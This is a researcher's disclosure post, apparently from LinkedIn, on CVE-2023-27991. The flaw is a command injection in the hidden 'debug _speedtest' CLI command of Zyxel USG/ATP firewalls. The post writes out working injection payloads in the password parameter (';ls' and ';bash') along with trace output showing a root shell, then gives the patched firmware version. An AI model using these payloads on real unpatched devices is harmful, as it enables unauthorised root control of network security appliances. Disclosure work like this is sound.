ZYXEL USG/ATP Series - ROOT SHELL by CLI command injection (CVE-2023-27991)
root shell from web-console (ZLD V4.30~V5.35)

ZYXEL USG/ATP Series - ROOT SHELL by CLI command injection (CVE-2023-27991)

Alessandro S. Alessandro S.

Alessandro S.

Network Engineer | Bug hunter | Security researcher | ZYXEL Hall of Fame

发布日期: 2023年4月27日
+ 关注

The report highlights a critical vulnerability (CVE-2023-27991) that allows an admin/limited-admin user to spawn a root shell by using a hidden "speedtest" command on the device.

The command executes a script present in the /tmp/ directory, but the vulnerability lies in the fact that the script can be modified through the speedtest command parameters, opening the door to a possible cyber attack.

For example, executing the speedtest command with the "host", "user", "password", and "interface" parameters can lead to the execution of the "speedtest.sh" script present in the /tmp/ directory.

The following output shows the execution of the script: 

Router# debug _speedtest host REDACTED user REDACTED password REDACTED interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n REDACTED
ftp: REDACTED: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

However, using an injection in the "password" parameter can allow a malicious user to execute commands on the device.

For instance, executing the speedtest command with the "password" parameter modified with the "ls" command allows viewing the files present in the /tmp/ directory: 

Router> debug _speedtest host REDACTED user REDACTED password REDACTED';ls' interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ ls
3G_patch_file.wwan_decryption? cdr? ? ? ? ? ? ? dev? ? ? ? ? ? ? ip_reputation? ? ? ? packet_trace? ? ? ?tr069
anti_botnet? ? ? ? ? ? ? ? ? ? cert? ? ? ? ? ? ?diaginfo_script? language? ? ? ? ? ? ?script? ? ? ? ? ? ?twofa
app_patrol? ? ? ? ? ? ? ? ? ? ?conf? ? ? ? ? ? ?firmware1? ? ? ? latest_version? ? ? ?standby_conf? ? ? ?wtp_image
av? ? ? ? ? ? ? ? ? ? ? ? ? ? ?current_version? firmware2? ? ? ? latest_version.test? system_protection
av_ct? ? ? ? ? ? ? ? ? ? ? ? ? debug? ? ? ? ? ? idp? ? ? ? ? ? ? liso? ? ? ? ? ? ? ? ?tmp
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n REDACTED
ftp: REDACTED: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

Finally, using the "password" parameter with the "bash" command allows spawning a root shell: 

Username: rain
Password:
Router# debug _speedtest host REDACTED user REDACTED password REDACTED';bash' interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ bash
bash-5.1# id; uname -a; cat /rw/fwversion
uid=0(root) gid=10000(operator) groups=0(root),10000(operator)
Linux ATP100-LABTEST04-R41N 3.10.87-rt80-Cavium-Octeon 2 SMP Fri Dec 23 04:07:52 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
KERNEL_VERSION=3.10.87
FIRMWARE_VER=5.35(ABPS.0)
CAPWAP_VER=1.00.04
COMPATIBLE_PRODUCT_MODEL_0=E153
COMPATIBLE_PRODUCT_MODEL_1=E17F
COMPATIBLE_PRODUCT_MODEL_2=FFFF
COMPATIBLE_PRODUCT_MODEL_3=FFFF
COMPATIBLE_PRODUCT_MODEL_4=FFFF
MODEL_ID=ATP100
KERNEL_BUILD_DATE=2022-12-23 04:08:09
BUILD_DATE=2022-12-23 04:42:07
FSH_VER=1.0.0
bash-5.1#

A patch for the vulnerability (CVE-2023-27991) is now available with the release of ZLD 5.36. The affected versions of the software were ZLD V4.30~V5.35.

It is highly recommended that users upgrade to the latest version of the software as soon as possible to ensure the security of their device.


Alessandro Sgreccia

要查看或添加评论,请登录

社区洞察